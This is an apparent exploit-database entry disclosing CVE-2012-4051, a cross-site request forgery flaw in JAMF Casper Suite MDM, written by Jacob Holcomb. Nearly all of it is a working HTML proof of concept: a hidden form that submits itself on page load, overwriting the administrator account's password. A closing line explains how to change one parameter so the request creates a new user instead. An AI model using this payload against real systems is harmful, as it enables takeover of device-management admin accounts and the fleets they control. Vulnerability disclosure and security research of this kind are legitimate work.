CVE-2012-4051 - JAMF Casper Suite MDM CSRF Vulnerability # Exploit Title: JAMF Software's Casper Suite MDM Solution CSRF # Date: Discovered and reported July 2012 # Author: Jacob Holcomb/Gimppy042 # Software JAMF Software Casper Suite (http://jamfsoftware.com/products/casper-suite) # CVE : CVE-2012-4051 for the CSRF <head> <title>PwNd JAMF Casper Admin CSRF BY:Jacob Holcomb</title> </head> <body> <form name="csrf" action="https://CASPERSUITE_SERVER:8443/editAccount.html" method="post"> <input type="hidden" name="view" value="Save"/> <input type="hidden" name="source" value="jss"/> <input type="hidden" name="lastPage" value="editAccountGeneral.jsp"/> <input type="hidden" name="lastTab" value="Account"/> <input type="hidden" name="username" value="Gimppy"/> <input type="hidden" name="realname" value="Pwnd"/> <input type="hidden" name="email" value="Admin"/> <input type="hidden" name="phone" value="Password"/> <input type="hidden" name="password" value="pwnd1"/> <input type="hidden" name="vpassword" value="pwnd1"/> <input type="hidden" name="user_id" value="1"/> </form> <script> document.csrf.submit(); </script> </body> </html> If the HTML parameter/variable "user_id" is changed to a value of negative one (-1) this request to the web server will create a new user.